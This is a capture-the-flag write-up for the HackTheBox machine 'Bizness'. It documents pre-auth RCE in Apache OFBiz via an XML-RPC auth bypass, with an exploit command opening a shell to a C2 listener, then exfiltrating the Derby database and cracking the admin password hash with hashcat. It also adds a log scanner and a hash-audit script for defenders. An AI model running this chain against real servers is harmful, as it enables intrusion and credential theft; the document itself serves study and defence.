~ / foobarto.me / htb-machines

bizness

Linux · Easy · released 2024-01-06 · retired 2024-05-25

Summary

Bizness is an Easy Linux box: CVE-2023-49070 + CVE-2023-51467 — pre-auth RCE in Apache OFBiz 18.12.09 via the legacy XML-RPC handler, reached with the auth-bypass query ?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y. A ysoserial CommonsBeanutils1 gadget → shell as ofbiz. Privesc: extract the embedded Apache Derby DB, query OFBIZ.user_login for admin’s $SHA$<salt>$<urlsafe-b64-hash>, decode the hash to hex, hashcat mode 120 → monkeybizness, then su - to root.

The chain:

  1. POST a ysoserial CommonsBeanutils gadget to /webtools/control/xmlrpc;/ → ofbiz shell.
  2. cd /opt/ofbiz/runtime/data/derby/; copy the DB out; in Derby ij: select user_login_id, current_password from user_login;.
  3. $SHA$<salt>$<hash> → reformat as <hash>:<salt> for hashcat mode 120 → monkeybizness.
  4. su - → root.

Recon

22/tcp     OpenSSH
443/tcp    Apache OFBiz 18.12.09

Foothold — CVE-2023-49070

The XML-RPC servlet was officially “removed” in 18.12.10 but 18.12.09 still has it under /webtools/control/xmlrpc. The matrix-parameter ; trick routes around the removal filter, and the requirePasswordChange=Y auth-bypass (CVE-2023-51467) removes the need for valid creds.

The PoC needs Java 11 to generate a working ysoserial payload — Java 17/21/25 break the CommonsBeanutils1 gadget because of the module system / removed reflection access:

sudo apt install -y openjdk-11-jre-headless
JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 \
PATH=$JAVA_HOME/bin:$PATH \
  python3 ofbiz_exploit.py https://bizness.htb shell <C2>:<p>
# -> ofbiz shell on listener

The exploit posts a <methodCall> with a base64-encoded CommonsBeanutils1 payload to /webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y.
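For the detection side of the same request shape: the two indicators above (the legacy /webtools/control/xmlrpc path, optionally with the matrix-parameter ";" segment that slips past the removal filter, and the USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y query) are cheap to hunt for in access logs. The scanner below is an added example, not part of this page or of any OFBiz/HTB tooling; the log lines are constructed in the combined-log format and the indicator names are my own. It normalizes matrix parameters out of the path before comparing, so "xmlrpc;/" and "xmlrpc" are caught by the same rule.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (combined access-log format). Not from the box;
# the paths and query strings mirror the ones the writeup describes.
SAMPLE_LOG = """\
10.10.14.5 - - [06/Jan/2024:10:01:12 +0000] "GET /control/main HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.5 - - [06/Jan/2024:10:01:40 +0000] "POST /webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y HTTP/1.1" 200 311 "-" "python-requests/2.31"
10.10.14.5 - - [06/Jan/2024:10:02:03 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 404 0 "-" "curl/8.4.0"
10.10.14.9 - - [06/Jan/2024:10:03:55 +0000] "GET /control/login?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y HTTP/1.1" 302 0 "-" "curl/8.4.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

XMLRPC_PATH = "/webtools/control/xmlrpc"


def normalize_path(raw_path):
    """Strip matrix parameters (';...' inside a segment), percent-decode, and
    collapse empty segments, so '/webtools/control/xmlrpc;/' == '/webtools/control/xmlrpc'."""
    segments = [seg.split(";", 1)[0] for seg in unquote(raw_path).split("/")]
    return "/" + "/".join(s for s in segments if s)


def classify(target):
    """Return the indicator names (hypothetical labels) that apply to one request target."""
    parts = urlsplit(target)
    path = normalize_path(parts.path)
    # Case-insensitive parameter names, upper-cased values: the bypass is 'Y' in any case.
    query = {k.lower(): [v.upper() for v in vals] for k, vals in parse_qs(parts.query).items()}
    hits = []
    if path == XMLRPC_PATH:
        hits.append("legacy-xmlrpc-endpoint")
        if ";" in parts.path:
            hits.append("matrix-param-filter-bypass")
    if (query.get("requirepasswordchange") == ["Y"]
            and query.get("username") == ["Y"]
            and query.get("password") == ["Y"]):
        hits.append("requirePasswordChange-auth-bypass")
    return hits


def scan(log_text):
    """Scan access-log text; return one finding per request that matches any indicator.
    A 404 on the xmlrpc path is still reported: it shows someone probing for it."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "status": int(m.group("status")),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run it as-is to see the three flagged lines; point scan() at a real access log by reading the file into a string. Matching on the normalized path rather than a substring is deliberate: a rule that only greps for the literal "/webtools/control/xmlrpc" misses the ";/" variant, and one that greps for "xmlrpc" anywhere drowns in unrelated hits.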

Privesc — Derby + SHA-with-salt

OFBiz uses Derby — a single-process embedded DB. To query it externally, copy out the ofbiz/ subdirectory (the full DB files), then run ij on a host with the matching Derby version (10.14.2.0). The derby-tools jar is not bundled on the target — install it on the attacker side or fetch matching versions from Maven Central.

# On target
ofbiz$ tar czf /tmp/derby.tgz -C /opt/ofbiz/runtime/data/derby ofbiz
ofbiz$ python3 -m http.server 8888 --directory /tmp &

# On attacker
$ curl -O http://<TARGET>:8888/derby.tgz
$ tar xzf derby.tgz
$ wget https://repo1.maven.org/maven2/org/apache/derby/derby/10.14.2.0/derby-10.14.2.0.jar
$ wget https://repo1.maven.org/maven2/org/apache/derby/derbytools/10.14.2.0/derbytools-10.14.2.0.jar

$ JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 \
  PATH=$JAVA_HOME/bin:$PATH \
  java -cp derby-10.14.2.0.jar:derbytools-10.14.2.0.jar org.apache.derby.tools.ij <<EOF
connect 'jdbc:derby:./ofbiz';
select user_login_id, current_password from OFBIZ.user_login;
EOF
# -> admin | $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

The hash field is URL-safe base64 of the raw SHA-1 digest, not hex. Decode to hex before feeding to hashcat:

python3 -c "
import base64
h='uP0_QaVBpDWFeo8-dRzDqRwXQ2I'
pad='=' * ((-len(h)) % 4)
print(base64.urlsafe_b64decode((h+pad).encode()).hex())
"
# -> b8fd3f41a541a435857a8f3e751cc3a91c174362

echo 'b8fd3f41a541a435857a8f3e751cc3a91c174362:d' > h
hashcat -m 120 -a 0 h rockyou.txt --quiet
# -> ...:d:monkeybizness
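What the hashcat step is really reversing is OFBiz's own password check: one unsalted-looking but actually salted pass of digest(salt || password), encoded as URL-safe base64 with the padding stripped and wrapped as $<hashType>$<salt>$<digest>. The script below is an added example (mine, not OFBiz code and not from the sources this page reconstructs): it parses that format, verifies a candidate the way the server does, emits the <hex>:<salt> line hashcat mode 120 wants, and flags accounts still stored as a single-round digest. The sample hash is the admin row quoted above; the PBKDF2-style row in the audit sample is a constructed placeholder, not a real OFBiz value.

```python
import base64
import hashlib
import hmac

# Admin hash as quoted in the writeup above.
SAMPLE_HASH = "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"

# hashType values that denote a plain salted digest, mapped to hashlib names.
# Anything else (e.g. a PBKDF2 prefix) is a different layout and is not parsed here.
SINGLE_ROUND_TYPES = {"SHA": "sha1", "SHA-1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}

# hashlib name -> hashcat mode for "digest($salt.$pass)".
HASHCAT_MODES = {"sha1": 120, "sha256": 1420, "sha512": 1720}


def parse_ofbiz_hash(stored):
    """Split '$<hashType>$<salt>$<urlsafe-b64 digest, no padding>'.
    Returns (hashlib name, salt, raw digest bytes)."""
    if not stored.startswith("$"):
        raise ValueError("not a typed OFBiz hash")
    _, hash_type, salt, b64 = stored.split("$", 3)
    if hash_type not in SINGLE_ROUND_TYPES:
        raise ValueError(f"unsupported hashType {hash_type!r}")
    algo = SINGLE_ROUND_TYPES[hash_type]
    padded = b64 + "=" * (-len(b64) % 4)          # OFBiz strips '=' padding
    digest = base64.urlsafe_b64decode(padded)
    if len(digest) != hashlib.new(algo).digest_size:
        raise ValueError("digest length does not match hashType")
    return algo, salt, digest


def verify_password(stored, candidate):
    """Recompute digest(salt bytes, then UTF-8 password) and compare in constant time."""
    algo, salt, digest = parse_ofbiz_hash(stored)
    h = hashlib.new(algo)
    h.update(salt.encode("utf-8"))
    h.update(candidate.encode("utf-8"))
    return hmac.compare_digest(h.digest(), digest)


def to_hashcat_line(stored):
    """Render as '<hexdigest>:<salt>' plus the matching mode number."""
    algo, salt, digest = parse_ofbiz_hash(stored)
    return f"{digest.hex()}:{salt}", HASHCAT_MODES[algo]


def is_single_round_digest(stored):
    """True when the hashType prefix is one of the plain salted-digest schemes."""
    return stored.startswith("$") and stored.split("$")[1] in SINGLE_ROUND_TYPES


def audit_user_logins(rows):
    """rows: iterable of (user_login_id, current_password) as pulled from OFBIZ.user_login.
    Returns the login ids whose stored password is a single-round digest, i.e. the ones
    that fall to a fast dictionary run the way the admin hash above did."""
    return [uid for uid, pw in rows if pw and is_single_round_digest(pw)]


if __name__ == "__main__":
    line, mode = to_hashcat_line(SAMPLE_HASH)
    print(f"hashcat -m {mode} input: {line}")
    print("monkeybizness matches:", verify_password(SAMPLE_HASH, "monkeybizness"))
    # Constructed audit sample; the PBKDF2 value is a placeholder, not a real hash.
    sample_rows = [("admin", SAMPLE_HASH), ("svc", "$PBKDF2-SHA1$constructed-placeholder"), ("api", None)]
    print("single-round accounts:", audit_user_logins(sample_rows))
```

The salt-first ordering in verify_password() is what makes hashcat mode 120 (sha1($salt.$pass)) the right choice rather than 110 (sha1($pass.$salt)); the single-character salt and the single digest pass are why rockyou finishes in seconds. On the defender side, audit_user_logins() over a dump of OFBIZ.user_login is a quick way to count how many accounts are still on the legacy scheme.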

su - from the ofbiz shell with monkeybizness lands a root shell. Direct SSH as root is disabled.

Why each step worked

Counterfactuals

Source attribution

Reconstruction is grounded in:

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.
